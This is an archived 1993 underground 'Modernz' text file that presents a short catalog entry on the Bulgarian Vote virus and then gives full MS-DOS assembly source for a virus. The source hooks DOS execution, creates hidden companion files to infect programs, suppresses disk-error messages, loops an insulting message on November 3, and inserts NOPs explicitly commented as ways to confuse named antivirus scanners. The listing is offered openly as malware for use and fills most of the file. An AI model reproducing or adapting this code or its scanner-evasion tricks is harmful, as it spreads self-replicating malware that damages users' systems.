gemini - kennedy.gemi.dev

💾 Archived View for gemini.spam.works › mirrors › textfiles › magazines › MODERNZ › modern67.txt captured on 2022-06-12 at 13:30:47.
View Raw
More Information
-=-=-=-=-=-=-


<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
         /*                                                       *\
       /  *                                                       *  \
     /    *                                                       *    \
   /      *                                                       *      \
 /        *                     Vote Virus                        *        \
|         *                                                       *        |
|         *                                                       *        |
|         *                                                       *        |
|         *           Another Modernz Presentation                *        |
|         *                                                       *        |
\         *                        by                             *       /
  \       *                     Multiphage                        *     / 
    \     *                                                       *   / 
      \   *            (C)opyright 5-13-93                        *  /
        \ *                                                       */

	******************************************************************************






<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>

	******************************************************************************


The Modernz can be contacted at:

                        MATRIX BBS
                        WOK-NOW!
                        World of Kaos NOW!
                        World of Knowledge NOW!
                        St. Dismis Institute
                        -  Sysops: Wintermute 
                                   Digital-demon
                       (908) 905-6691
                       (908) WOK-NOW!
                       (908) 458-xxxx
                       1200/2400/4800/9600
                       14400/19200/38400
                       Home of Modernz Text Philez

<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><
<*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*>
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>

                                      Vote

 
 Virus Name:  Vote
 Aliases:   
 V Status:    Rare
 Discovered:  June, 1992
 Symptoms:    .COM file growth; system hangs; message display
 Origin:      Bulgaria
 Eff Length:  1,004 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector
 Detection Method:  AVTK, Sweep, VNet, ViruScan, IBMAV, F-Prot, VET,
                    VBuster 3.93+, UTScan 25.10+, Vi-Spy, NShld, Sweep/N
 Removal Instructions:  Delete infected files

 General Comments:
       The Vote virus was submitted in June, 1992.  It is originally from
       Bulgaria.  Vote is a non-resident direct action infector of .COM
       files, including COMMAND.COM.

       When a program infected with the Vote virus is executed, the Vote
       virus will infect the first .COM program located in the current
       directory.  If this program was previously infected with Vote, the
       virus will reinfect it.  The program the user was attempting to
       execute will then run.  When the user attempts to execute another
       program, .BAT file, or DOS command, a system hang will usually
       occur.

       Programs infected with the Vote virus will have a file length
       increase of 1,004 bytes for each infection of Vote within the file.
       The Vote virus will be located at the end of the file.  The program's
       date and time in the DOS disk directory listing will not be altered.

       Known variant(s) of Vote are:
       Vote-1000: A later version of the Vote virus, this variant does
                  not reinfect programs.  It infects one of the first four
                  .COM files in the current directory when an infected
                  program is executed.  Infected programs will have a file
                  length increase of 1,000 bytes with the virus located at
                  the end of the file.  The program's date and time in the
                  DOS disk directory listing will not be altered.  Vote-1000
                  will occassionally attempt to display a message, though
                  the message may be in cyrillic and is thus unreadable on
                  most systems.
                  Origin:  Bulgaria  June, 1992

code            segment
		assume  cs:code,ds:code,es:nothing

		.RADIX  16


oi21            equ     endit
nameptr         equ     endit+4
DTA             equ     endit+8


;****************************************************************************
;*    Check for activation date, then proceed to installation!
;****************************************************************************

		org     100h

begin:     
		call    get_day       ; Get the day, DOS time/date grab
		cmp     ax,0003h      ; Did the function return the 3rd?
		jne     realstrt      ; If equal, continue along stream
		call    get_month     ; Get the month, DOS time/date grab
		cmp     ax,000Bh      ; Did the function return November (11)?
		jne     realstrt      ; If equal, continue to blooie; if not
				      ; skip to loading of virus


blooie:         mov     dx, offset shithead  ;load 'shithead' message
		mov     ah,9                 ;display it and loop
		int     21h                  ;endlessly until
		jmp     blooie               ;user becomes ill and reboots

realstrt:       mov     ax,0044h      ;move VOTE SHITHEAD to empty hole in RAM
		nop                   ;a 'nop' to confuse tbSCAN
		mov     es,ax
		nop                   ;a 'nop' to confuse Datatechnik's AVscan
		mov     di,0100h
		mov     si,di
		mov     cx,endit - begin  ;length of SHITHEAD into cx
	rep     movsb

		mov     ds,cx            ;get original int21 vector
		mov     si,0084h
		mov     di,offset oi21
		mov     dx,offset ni21
		lodsw
		cmp     ax,dx             ;check to see if virus is around
		je      cancel            ; by comparing new interrupt (ni21)
		stosw                     ; vector to current, if it looks
		movsw                     ; the same 'cancel' operation

		push    es                      ;set vector to new handler
		pop     ds
		mov     ax,2521h
		int     21h

cancel:         ret


;****************************************************************************
;*    File-extension masks for checking and naming routines;message text
;****************************************************************************

EXE_txt         db      'EXE',0
COM_txt         db      'COM',0
SHITHEAD        db      "DID YOU VOTE, SHITHEAD??"
		db      07h,07h,'




;****************************************************************************
;*              Interrupt handler 24
;****************************************************************************

ni24:           mov     al,03   ;virus critical error handler
		iret            ;prevents embarrassing messages
				;on attempted writes to protected disks

;****************************************************************************
;*              Interrupt handler 21
;****************************************************************************

ni21:           pushf

		push    es
		push    ds
		push    ax
		push    bx
		push    dx
		
		cmp     ax,4B00h         ;now that we're installed
		jne     exit             ; check for 4B00, DOS excutions

doit:           call    infect          ; if one comes by, grab it

exit:           pop      dx             ; if anything else, goto sleep
		pop      bx
		pop      ax
		pop      ds
		pop      es
		popf

		jmp     dword ptr cs:[oi21]  ;call to old int-handler


;****************************************************************************
;*              Try to infect a file (ptr to ASCIIZ-name is DS:DX)
;****************************************************************************

infect:         cld

		mov     word ptr cs:[nameptr],dx  ;save the ptr to the filename
		mov     word ptr cs:[nameptr+2],ds

		mov     ah,2Fh                  ;get old DTA
		int     21
		push    es
		push    bx

		push    cs                      ;set new DTA

		pop     ds
		mov     dx,offset DTA
		mov     ah,1Ah
		int     21

		call    searchpoint            ; here's where we grab a name
		push    di                     ; for ourselves
		mov     si,offset COM_txt       ;is extension 'COM'?
						
		mov     cx,3
	rep     cmpsb
		pop     di
		jz      do_com                ;if so, go to our .COM routine 

		mov     si,offset EXE_txt     ;is extension 'EXE'?
		nop                           ;'nop' to confuse SCAN v95b.
		mov     cl,3
		rep     cmpsb                 
		jnz     return

do_exe:         mov     si,offset COM_txt     ;change extension to COM
		nop                           ;another 'nop' to confuse SCAN
		call    change_ext             

		mov     ax,3300h              ;get ctrl-break flag
		nop
		int     21                    
		push    dx

		cwd                           ;clear the flag
		inc     ax
		push    ax
		int     21

		mov     ax,3524h              ;get int24 vector
		int     21                    
		push    bx                    
		push    es

		push    cs                    ;set int24 vector to new handler
		pop     ds                    ;virus handles machine
		mov     dx,offset ni24        ;exits on attempted writes
		mov     ah,25h                ;to write-protected disks 
		push    ax
		int     21

		lds     dx,dword ptr [nameptr] ;create the virus (with name of .EXE target)
		mov     ah,03Ch                ; DOS create file function
		mov     cx,00100111b           ; CX holds file attributes (all)
		int     021h                   ; makes it hidden/system/read-only
					       ; do it
		xchg    bx,ax                  ;save handle

		push    cs
		pop     ds
		mov     cx,endit - begin        ; write the virus to the created file
		mov     dx,offset begin         ; CX contains length
		mov     ah,40h                  ; write to file function
		int     21

		mov     ah,3Eh                  ;close the file
		int     21


return1:        pop     ax                      ;restore int24 vector
		pop     ds
		pop     dx
		int     21

		pop     ax                      ;restore ctrl-break flag
		pop     dx
		int     21

		mov     si,offset EXE_txt       ;change extension to EXE
		call    change_ext              ;execute EXE-file

return:         mov     ah,1Ah                  ;restore old DTA
		pop     dx
		pop     ds
		int     21

		ret

do_com:         call    findfirst               ;is the COM-file a virus?
		cmp     word ptr cs:[DTA+1Ah],endit - begin  ;compare it to virus length
		jne     return                  ;no, so execute COM-file
		mov     si,offset EXE_txt       ;does the EXE-variant exist?
		call    change_ext
		call    findfirst
		jnc     return                  ;yes, execute EXE-file
		mov     si,offset COM_txt       ;change extension to COM
		call    change_ext
		jmp     short return            ;execute COM-file

;****************************************************************************
;*              Search beginning of extension for name we will usurp  
;****************************************************************************

searchpoint:    les     di,dword ptr cs:[nameptr]
		mov     ch,0FFh
		mov     al,0
	repnz   scasb
		sub     di,4
		ret

;****************************************************************************
;*          Change the extension of the filename (CS:SI -> ext)
;****************************************************************************

change_ext:     call    searchpoint
		push    cs
		pop     ds
		movsw
		movsw
		ret



;****************************************************************************
;*              Find the file
;****************************************************************************

findfirst:      lds     dx,dword ptr [nameptr]
		mov     cl,27h
		mov     ah,4Eh
		int     21
		ret                

;****************************************************************************
;*       Get the day off the system for activation checking
;****************************************************************************
get_day:
		mov     ah,02Ah                 ; DOS get date function
		int     021h
		mov     al,dl                   ; Copy day into AL
		cbw                             ; Sign-extend AL into AX
		ret                             ; Get back to caller
;*************************************************************************
;*      Get the month off the system for activation checking
;*************************************************************************

get_month:
		mov     ah,02Ah                 ; DOS get date function
		int     021h
		mov     al,dh                   ; Copy month into AL
		cbw                             ; Sign-extend AL into AX
		ret                             ; Get back to caller


endit:

code            ends
		end     begin